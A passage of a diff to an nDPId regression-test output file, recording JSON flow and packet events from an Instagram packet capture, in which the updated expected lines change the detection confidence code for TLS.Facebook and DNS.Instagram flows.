00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908466,"flow_last_seen":1436720908466,"flow_idle_time":7580000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908466,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1436720908466,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1015,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1015,"pkt_l4_len":981,"thread_ts_msec":1436720908466,"pkt":"ABsv8H60QPMIw47hCABFAAPpXL5AAEAGnQDAqABnHw1dNIPjAbuhtt+gEOOOT4AYCqMt2AAAAQEICgAD7nvwIEj8FwMBA7DXpbZuuL+a3+A25sPf3KC8vtrovZX7fcip20iH4gbDYKHRurDuUNBuKdxbaf8w5NnTQml9NHFuaiFV9xaPTEtRbbFB9QgL8vlHsxgX1jfO9ZT6YB1lbKI1n65g8AZltFoEnCsmCE1IOxVyjBVZQT7po2puEnrF+kDYe4098KgZgFIZStFzMtmo9XOmOfNP+iRYctfjIeGJz8jQ1lFBvHEsbbQIygOCYn9oDm7CXWwj2LvemnGFKWnWYwKY2HgH6zrHi9xUd7CDCihcewk3nTPbbyiC\/Oifk2F1KjvO+B1lmqoGqUOYx21p5F3Yy7giHbLKSW+ti05sAV0fAKz7Z8+aVWuucvLaUbW+dSKFEZubeujNKIbXr7vCkpaZCatjRYZUgGNtsk2NBSXDlVMA\/v3I+TpoH8L5Ft2TQGs+aL8gJ2KVF6O2+ZYxZ96KcyiQmukk5fWpPjyBq7B0lhl8\/l+87aNWAB+03OvN8FhYV+S\/gv75JF3N388CBkyP4ME8FRt4W55y8LCj1tqiL9fodHUaE6F0ridmX8h0+Dsd82vVVQdbomtwYWVDLtEOA4gG2jJjDPllVf5J8xmFGHsA6M\/TDTHEfu8LTRQc1d6jnJGUH9Eeq7GjZHoFXfcfkpY9BGbqJWKidAdwRrWxc1XI2wcOmTiqvy3W0kHXHGHBqtUOPHt80fdZz3Php0HqhVjapNrBUUzl1zXCtqo+\/D90yVXLpIbqbzqp1UOs3uY9nrVZKeWZAphdT0b38N153F9QCQaE1j\/B3yRInHVxnxDr8\/wXaBQutJGt+fT8YapiNjDh2B5Fe\/VzJjaUK9\/s\/F4+YAkFfcLJJgpkyZ1FyjpKFDmEKLJS\/hWon3VkTkSPBJyUnbR06ETQWOqnwWcQKPcsS14LaHbhuVhKdt2tBBxQtcd0OoPW2aLOEDh9uAs1wndQ8cDwLHeWOSYDiwyq7hmF978JHTDY5T9UPy1BfhkIGr1397oeYW8tQLiHwwHKS6l11zZwAq8rb2bsBNkrNvLFUBdxAJWO7YtLy1slqNoFAyDdp7eKwmaP317WVsHGvyiwNdASVNzu1pbccCR6AgqCnTrbOntDjyNK4u2jrQuFCeBAMKVe19ptimavwWdWcfiYh6zgKaavEskV4nXhC01pvDJfX\/uuk2wAy46ocrpdos3RqXm7EpLF72d506O+IxXSSlwIplmFgawKqTtoIASL2SkYHX0Y3wKxf+vCHqdiD1nEkmvwUYQ8dkrjuTHBA1bDvg=="} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908466,"flow_last_seen":1436720908466,"flow_idle_time":7580000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908466,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908466,"flow_last_seen":1436720908466,"flow_idle_time":7580000,"flow_min_l4_payload_len":949,"flow_max_l4_payload_len":949,"flow_tot_l4_payload_len":949,"flow_avg_l4_payload_len":949,"midstream":1,"thread_ts_msec":1436720908466,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1436720908518,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908518,"pkt":"QPMIw47hABsv8H60CABFAAA0kN9AAFUGV5QfDV00wKgAZwG7g+MQ445PobbjVYAQANn+UgAAAQEICvAgscMAA+57"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908521,"flow_last_seen":1436720908521,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720908521,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1436720908521,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908521,"pkt":"ABsv8H60QPMIw47hCABFAAA0\/y1AAEAGBcbAqABnLiFGoJehAFBl4Bu99+Pb34ARFTc19wAAAQEICgAD7oGa3vT1"} @@ -76,53 +75,53 @@ 00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720901182,"flow_last_seen":1436720908522,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":26795,"flow_avg_l4_payload_len":837,"midstream":1,"thread_ts_msec":1436720908522,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908523,"flow_last_seen":1436720908523,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908523,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1436720908523,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1436720908523,"pkt":"ABsv8H60QPMIw47hCABFAABL7oFAAEARewHAqABnCAgICMgTADUANxLxN7ABAAABAAAAAAAAEGlnY2RuLXBob3Rvcy1oLWEIYWthbWFpaGQDbmV0AAABAAE="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908523,"flow_last_seen":1436720908523,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908523,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-h-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908523,"flow_last_seen":1436720908523,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908523,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-h-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908524,"flow_last_seen":1436720908524,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908524,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1436720908524,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1436720908524,"pkt":"ABsv8H60QPMIw47hCABFAABL7oFAAEARewHAqABnCAgICINDADUANycOb2MBAAABAAAAAAAAEGlnY2RuLXBob3Rvcy1hLWEIYWthbWFpaGQDbmV0AAABAAE="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908524,"flow_last_seen":1436720908524,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908524,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-a-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908524,"flow_last_seen":1436720908524,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908524,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-a-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908531,"flow_last_seen":1436720908531,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720908531,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57966,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1436720908531,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908531,"pkt":"ABsv8H60QPMIw47hCABFAAA0NKZAAEAG2ADAqABnUlUaueJuAFA8SfXPvvA\/t4ARCm0uRAAAAQEICgAD7oJZ6tXr"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908533,"flow_last_seen":1436720908533,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908533,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1436720908533,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1436720908533,"pkt":"ABsv8H60QPMIw47hCABFAABL7oJAAEARewDAqABnCAgICGesADUANyZVhbMBAAABAAAAAAAAEGlnY2RuLXBob3Rvcy1nLWEIYWthbWFpaGQDbmV0AAABAAE="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908533,"flow_last_seen":1436720908533,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908533,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-g-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"instagram.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908533,"flow_last_seen":1436720908533,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1436720908533,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":26540,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-g-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1436720908542,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908542,"pkt":"QPMIw47hABsv8H60CABFAAA0lYxAADkGdmcuIUagwKgAZwBQl6H349vfZeAbvoARAeZr3wAAAQEICprfXG4AA+6B"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1436720908542,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908542,"pkt":"ABsv8H60QPMIw47hCABFAAA0\/y5AAEAGBcXAqABnLiFGoJehAFBl4Bu+9+Pb4IAQFTc19wAAAQEICgAD7oOa31xu"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1436720908567,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908567,"pkt":"QPMIw47hABsv8H60CABFAAA0dopAADkGnRxSVRq5wKgAZwBQ4m6+8D+3PEn10IARAgj5iQAAAQEIClnq8RsAA+6C"} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"instagram.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1436720908567,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720908567,"pkt":"ABsv8H60QPMIw47hCABFAAA0NKdAAEAG1\/\/AqABnUlUaueJuAFA8SfXQvvA\/uIAQCm0uRAAAAQEICgAD7oVZ6vEb"} 00792{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1436720908570,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":305,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":305,"pkt_l4_len":271,"thread_ts_msec":1436720908570,"pkt":"QPMIw47hABsv8H60CABFAAEjliwAADgRGn8ICAgIwKgAZwA1yBMBD5NUN7CBgAABAAoAAAAAEGlnY2RuLXBob3Rvcy1oLWEIYWthbWFpaGQDbmV0AAABAAHADAAFAAEAAAAZACoQaWdjZG4tcGhvdG9zLWgtYQhha2FtYWloZANuZXQJZWRnZXN1aXRlwCbAOwAFAAEAADHJABYFYTE0MDgGZHNwdzQzBmFrYW1hacAmwHEAAQABAAAAEwAELiFGrsBxAAEAAQAAABMABC4hRqHAcQABAAEAAAATAAQuIUawwHEAAQABAAAAEwAELiFGpsBxAAEAAQAAABMABC4hRo\/AcQABAAEAAAATAAQuIUagwHEAAQABAAAAEwAELiFGqcBxAAEAAQAAABMABC4hRrc="} -00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":360,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908523,"flow_last_seen":1436720908570,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1436720908570,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-h-a.akamaihd.net","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"46.33.70.174"}} +00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":360,"source":"instagram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908523,"flow_last_seen":1436720908570,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1436720908570,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":51219,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-h-a.akamaihd.net","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"46.33.70.174"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908572,"flow_last_seen":1436720908572,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908572,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1436720908572,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908572,"pkt":"ABsv8H60QPMIw47hCABFAAA8iDpAAEAGfKPAqABnLiFGrq4OAbuyG2a8AAAAAKACOQg2DQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1436720908575,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1436720908575,"pkt":"QPMIw47hABsv8H60CABFAADD9CwAADgRvN4ICAgIwKgAZwA1g0MAr7pub2OBgAABAAQAAAAAEGlnY2RuLXBob3Rvcy1hLWEIYWthbWFpaGQDbmV0AAABAAHADAAFAAEAAAAhACoQaWdjZG4tcGhvdG9zLWEtYQhha2FtYWloZANuZXQJZWRnZXN1aXRlwCbAOwAFAAEAAFRcABYFYTEwMDEGZHNwdzQwBmFrYW1hacAmwHEAAQABAAAAEwAEUlUamsBxAAEAAQAAABMABFJVGpk="} -00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908524,"flow_last_seen":1436720908575,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1436720908575,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-a-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"82.85.26.154"}} +00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720908524,"flow_last_seen":1436720908575,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1436720908575,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"igcdn-photos-a-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"82.85.26.154"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908576,"flow_last_seen":1436720908576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908576,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"instagram.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1436720908576,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908576,"pkt":"ABsv8H60QPMIw47hCABFAAA8nwVAAEAGbbjAqABnUlUamqDdAbvgTnGDAAAAAKACOQguLQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":364,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720908577,"flow_last_seen":1436720908577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720908577,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.154","src_port":41182,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"instagram.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1436720908577,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720908577,"pkt":"ABsv8H60QPMIw47hCABFAAA8GZtAAEAG8yLAqABnUlUamqDeAbviOvcdAAAAAKACOQguLQAAAgQFtAQCCAoAA+6GAAAAAAEDAwY="} 